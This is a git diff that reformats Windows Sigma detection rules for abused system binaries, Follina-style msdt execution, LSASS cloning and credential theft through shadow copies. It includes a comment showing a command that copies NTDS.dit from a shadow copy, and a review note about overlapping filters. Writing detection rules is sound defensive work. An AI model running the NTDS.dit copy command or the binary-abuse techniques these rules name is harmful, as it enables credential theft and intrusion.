- listed in Microsoft's recommended block rules.
+description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@@ -19,8 +18,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \wfc.exe
- - OriginalFileName: wfc.exe
+ - NewProcessName|endswith: \wfc.exe
+ - OriginalFileName: wfc.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use by a software developer
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml
index 66d166056..835717f5c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml
@@ -18,24 +18,24 @@ detection:
 EventID: 4688
 Channel: Security
 selection_child_img:
- - NewProcessName|endswith: \wlrmdr.exe
- - OriginalFileName: WLRMNDR.EXE
+ - NewProcessName|endswith: \wlrmdr.exe
+ - OriginalFileName: WLRMNDR.EXE
 selection_child_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
+ # Note that the dash "-" can be replaced with a slash "/" (TODO: Use the "windash" modifier when it's introduced)
 - '-s '
 - '-f '
 - '-t '
 - '-m '
 - '-a '
 - '-u '
- selection_parent:
+ selection_parent: # This selection is looking for processes spawned from wlrmdr using the "-u" flag
 ParentProcessName|endswith: \wlrmdr.exe
 filter:
 ParentProcessName: C:\Windows\System32\winlogon.exe
 filter_null:
 ParentProcessName: '-'
- condition: process_creation and (selection_parent or (all of selection_child_*
- and not 1 of filter*))
+ condition: process_creation and (selection_parent or (all of selection_child_* and not 1 of filter*))
 falsepositives:
 - Unknown
 level: medium
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
index 363b134c2..83f792d12 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
@@ -1,8 +1,7 @@
 title: Microsoft Workflow Compiler Execution
 id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d
 status: test
-description: Detects invocation of Microsoft Workflow Compiler, which may permit the
- execution of arbitrary unsigned code.
+description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
 references:
 - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
@@ -23,8 +22,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \Microsoft.Workflow.Compiler.exe
- - OriginalFileName: Microsoft.Workflow.Compiler.exe
+ - NewProcessName|endswith: \Microsoft.Workflow.Compiler.exe
+ - OriginalFileName: Microsoft.Workflow.Compiler.exe
 condition: process_creation and selection
 fields:
 - CommandLine
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml b/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml
index 153a3785c..50b9312d7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml
@@ -1,10 +1,7 @@
 title: Potential Register_App.Vbs LOLScript Abuse
 id: 28c8f68b-098d-45af-8d43-8089f3e35403
 status: test
-description: Detects potential abuse of the "register_app.vbs" script that is part
- of the Windows SDK. The script offers the capability to register new VSS/VDS Provider
- as a COM+ application. Attackers can use this to install malicious DLLs for persistence
- and execution.
+description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
 references:
 - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20
 - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs
@@ -22,14 +19,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \cscript.exe
- - \wscript.exe
- - OriginalFileName:
- - cscript.exe
- - wscript.exe
+ - NewProcessName|endswith:
+ - \cscript.exe
+ - \wscript.exe
+ - OriginalFileName:
+ - cscript.exe
+ - wscript.exe
 selection_cli:
- CommandLine|contains: '.vbs -register '
+ CommandLine|contains: '.vbs -register ' # register_app.vbs
 condition: process_creation and (all of selection*)
 falsepositives:
 - Other VB scripts that leverage the same starting command line flags
diff --git a/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml b/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml
index 789d0e653..a01e219ac 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml
@@ -1,8 +1,7 @@
 title: Potential Credential Dumping Via LSASS Process Clone
 id: c8da0dfd-4ed0-4b68-962d-13c9c884384e
 status: test
-description: Detects a suspicious LSASS process process clone that could be a sign
- of credential dumping activity
+description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
 references:
 - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
 - https://twitter.com/Hexacorn/status/1420053502554951689
@@ -23,7 +22,7 @@ detection:
 Channel: Security
 selection:
 ParentProcessName|endswith: \Windows\System32\lsass.exe
- NewProcessName|endswith: \Windows\System32\lsass.exe
+ NewProcessName|endswith: \Windows\System32\lsass.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
index f8e9752cc..b79af1076 100644
--- a/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
@@ -1,8 +1,7 @@
 title: Sensitive Registry Access via Volume Shadow Copy
 id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d
 status: test
-description: Detects a command that accesses password storing registry hives via volume
- shadow backups
+description: Detects a command that accesses password storing registry hives via volume shadow backups
 references:
 - https://twitter.com/vxunderground/status/1423336151860002816?s=20
 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
@@ -21,9 +20,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_1:
- CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy
+ # copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1
+ # There is an additional "\" to escape the special "?"
+ CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy
 selection_2:
- CommandLine|contains:
+ CommandLine|contains:
 - \\NTDS.dit
 - \\SYSTEM
 - \\SECURITY
diff --git a/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml b/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml
index 73f9dccfe..a4ce1abec 100644
--- a/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml
@@ -17,14 +17,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection1:
- CommandLine|contains:
+ CommandLine|contains:
 - C:\Users\
 - C:\ProgramData\
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \wscript.exe
 - \cscript.exe
 selection2:
- CommandLine|contains:
+ CommandLine|contains:
 - .jse
 - .vbe
 - .js
diff --git a/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml
index 476d3fffc..5b89389a2 100644
--- a/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml
@@ -1,8 +1,7 @@
 title: Potential Mftrace.EXE Abuse
 id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e
 status: experimental
-description: Detects child processes of the "Trace log generation tool for Media Foundation
- Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
+description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
index 90c113b87..1a7b32b97 100644
--- a/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
@@ -1,9 +1,7 @@
 title: MMC20 Lateral Movement
 id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
 status: test
-description: Detects MMC20.Application Lateral Movement; specifically looks for the
- spawning of the parent MMC.exe with a command line of "-Embedding" as a child
- of svchost.exe
+description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
 references:
 - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
@@ -21,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: -Embedding + CommandLine|contains: -Embedding ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \mmc.exe + NewProcessName|endswith: \mmc.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml index 0e02f5721..3d42b0a79 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml @@ -20,17 +20,17 @@ detection: selection1: ParentProcessName|endswith: \mmc.exe selection2: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - NewProcessName|contains: \BITSADMIN + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - NewProcessName|contains: \BITSADMIN condition: process_creation and (all of selection*) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml index 2a45456bd..9c7b8bbf1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mofcomp_execution.yml 
@@ -1,15 +1,10 @@
 title: Potential Suspicious Mofcomp Execution
 id: 1dd05363-104e-4b4a-b963-196a534b03a1
 status: experimental
-description: 'Detects execution of the "mofcomp" utility as a child of a suspicious
- shell or script running utility or by having a suspicious path in the commandline.
-
- The "mofcomp" utility parses a file containing MOF statements and adds the classes
- and class instances defined in the file to the WMI repository.
-
+description: |
+ Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
+ The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
 Attackers abuse this utility to install malicious MOF scripts
-
- '
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml
@@ -28,32 +23,32 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \mofcomp.exe
- - OriginalFileName: mofcomp.exe
+ - NewProcessName|endswith: \mofcomp.exe
+ - OriginalFileName: mofcomp.exe
 selection_case:
- - ParentProcessName|endswith:
- - \cmd.exe
- - \powershell.exe
- - \pwsh.exe
- - \wsl.exe
- - \wscript.exe
- - \cscript.exe
- - CommandLine|contains:
- - \AppData\Local\Temp
- - \Users\Public\
- - \WINDOWS\Temp\
- - '%temp%'
- - '%tmp%'
- - '%appdata%'
+ - ParentProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \wsl.exe
+ - \wscript.exe
+ - \cscript.exe
+ - CommandLine|contains:
+ - \AppData\Local\Temp
+ - \Users\Public\
+ - \WINDOWS\Temp\
+ - '%temp%'
+ - '%tmp%'
+ - '%appdata%'
 filter_main_wmiprvse:
- CommandLine|contains: C:\Windows\TEMP\
- CommandLine|endswith: .mof
+ CommandLine|contains: C:\Windows\TEMP\
+ CommandLine|endswith: .mof
 ParentProcessName: C:\Windows\System32\wbem\WmiPrvSE.exe
 filter_optional_null_parent:
- CommandLine|contains: C:\Windows\TEMP\
- CommandLine|endswith: .mof
- condition: process_creation and (all of selection_* and not 1 of filter_main_*
- and not 1 of filter_optional_*)
+ # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider.
+ CommandLine|contains: C:\Windows\TEMP\
+ CommandLine|endswith: .mof
+ condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
index ec492162a..02bb67d4b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
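Review bot: `filter_optional_null_parent` is a strict superset of `filter_main_wmiprvse` — both carry the same `CommandLine|contains: C:\Windows\TEMP\` and `CommandLine|endswith: .mof` conditions and the optional filter adds no parent constraint, so under `not 1 of filter_optional_*` the WmiPrvSE-specific filter never excludes anything on its own, and any .mof compile from C:\Windows\TEMP\ is suppressed even when the parent is one of the shells listed in `selection_case`. The added comment says the filter is meant for events where the parent information is unavailable, but nothing in the rule checks that; pinning it, e.g. `ParentProcessName: null` (or whichever null-field form the backend used here supports), would restrict the filter to that case. If the backend cannot express a missing field, the comment should at least state that this filter also covers every case `filter_main_wmiprvse` covers, so the next maintainer does not expect the WmiPrvSE filter to be doing independent work.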
@@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading Via Defender Binaries id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 related: - - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc - type: similar + - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj @@ -22,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \MpCmdRun.exe - \NisSrv.exe filter_main_known_locations: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files (x86)\Windows Defender\ - C:\Program Files\Microsoft Security Client\ - C:\Program Files\Windows Defender\ diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml index 6cb992537..aeb886ec4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml 
@@ -21,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: MpCmdRun.exe - - NewProcessName|endswith: \MpCmdRun.exe - - CommandLine|contains: MpCmdRun.exe - - Description: Microsoft Malware Protection Command Line Utility + - OriginalFileName: MpCmdRun.exe + - NewProcessName|endswith: \MpCmdRun.exe + - CommandLine|contains: MpCmdRun.exe + - Description: Microsoft Malware Protection Command Line Utility selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - DownloadFile - url condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml index 4a72c29bc..b99b8ab04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml @@ -1,8 +1,7 @@ title: Windows Defender Definition Files Removed id: 9719a8aa-401c-41af-8108-ced7ec9cd75c status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by removing Windows Defender Definition Files +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ 
@@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \MpCmdRun.exe - - OriginalFileName: MpCmdRun.exe + - NewProcessName|endswith: \MpCmdRun.exe + - OriginalFileName: MpCmdRun.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -RemoveDefinitions' - ' -All' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml index f164e275c..74f8afa09 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml @@ -17,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \MSBuild.exe - - OriginalFileName: MSBuild.exe + - NewProcessName|endswith: \MSBuild.exe + - OriginalFileName: MSBuild.exe filter_parent: ParentProcessName|endswith: - \devenv.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml index d1ac9601c..c28a36aba 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml 
@@ -1,8 +1,7 @@ title: Potential Arbitrary Command Execution Using Msdt.EXE id: 258fc8ce-8352-443a-9120-8a11e4857fa5 status: test -description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" - binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -21,18 +20,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd_inline: - CommandLine|contains: IT_BrowseForFile= + CommandLine|contains: IT_BrowseForFile= selection_cmd_answerfile_flag: - CommandLine|contains: ' PCWDiagnostic' + CommandLine|contains: ' PCWDiagnostic' selection_cmd_answerfile_param: - CommandLine|contains: + CommandLine|contains: - ' /af ' - ' -af ' - condition: process_creation and (selection_img and (selection_cmd_inline or all - of selection_cmd_answerfile_*)) + condition: process_creation and (selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml index 6dde97b28..2f9192bf2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml 
@@ -1,11 +1,10 @@ title: Suspicious Cabinet File Execution Via Msdt.EXE id: dc4576d4-7467-424f-9eee-fd2b02855fe0 related: - - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 - type: obsoletes + - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 + type: obsoletes status: test -description: Detects execution of msdt.exe using the "cab" flag which could indicates - suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 references: - https://twitter.com/nas_bench/status/1537896324837781506 - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab @@ -25,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab ' - ' -cab ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml index 109b55f31..ca9fc239e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml @@ -1,8 +1,7 @@ title: Suspicious MSDT Parent Process id: 7a74da6b-ea76-47db-92cc-874ad90df734 status: test -description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 - / Follina exploitation +description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ 
@@ -33,9 +32,10 @@ detection: - \wmic.exe - \wscript.exe - \wsl.exe + # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50 selection_msdt: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml b/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml index 99cd600d2..7e033f98f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msedge_proxy.exe - - OriginalFileName: msedge_proxy.exe + - NewProcessName|endswith: \msedge_proxy.exe + - OriginalFileName: msedge_proxy.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml index 14a442703..27bee1913 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_http.yml 
@@ -1,9 +1,7 @@ title: Remotely Hosted HTA File Executed Via Mshta.EXE id: b98d0db6-511d-45de-ad02-e82a98729620 status: test -description: Detects execution of the "mshta" utility with an argument containing - the "http" keyword, which could indicate that an attacker is executing a remotely - hosted malicious hta file +description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml index 9fefb0d4c..68c372d6d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml 
@@ -1,8 +1,7 @@ title: Wscript Shell Run In CommandLine id: 2c28c248-7f50-417a-9186-a85b223010ee status: experimental -description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in - the command, which could indicate a suspicious activity +description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity references: - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ @@ -20,13 +19,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Wscript. - .Shell - .Run condition: process_creation and selection falsepositives: - - Inline scripting can be used by some rare third party applications or administrators. - Investigate and apply additional filters accordingly + - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml index 11904c1ed..d27815f5a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_javascript.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: javascript + CommandLine|contains: javascript condition: process_creation and (all of selection_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml index 48f2f3600..e25932d0c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml @@ -1,8 +1,7 @@ title: Potential LethalHTA Technique Execution id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471 status: test -description: Detects potential LethalHTA technique where the "mshta.exe" is spawned - by an "svchost.exe" process +description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process references: - https://codewhitesec.blogspot.com/2018/07/lethalhta.html author: Markus Neis @@ -20,7 +19,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \mshta.exe + NewProcessName|endswith: \mshta.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml index 7af0cea59..529cfa93d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Suspicious MSHTA Child Process id: 03cc0c25-389f-4bf8-b48d-11878079f1ca status: test -description: Detects a suspicious process spawning from an "mshta.exe" process, which - could be indicative of a malicious HTA script execution +description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution references: - https://www.trustedsec.com/july-2015/malicious-htas/ author: Michael Haag 
@@ -24,27 +23,27 @@ detection: selection_parent: ParentProcessName|endswith: \mshta.exe selection_child: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - \bitsadmin.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe - - cscript.exe - - Bash.exe - - reg.exe - - REGSVR32.EXE - - bitsadmin.exe + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - \bitsadmin.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe + - cscript.exe + - Bash.exe + - reg.exe + - REGSVR32.EXE + - bitsadmin.exe condition: process_creation and (all of selection*) falsepositives: - Printer software / driver installations diff --git a/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml index 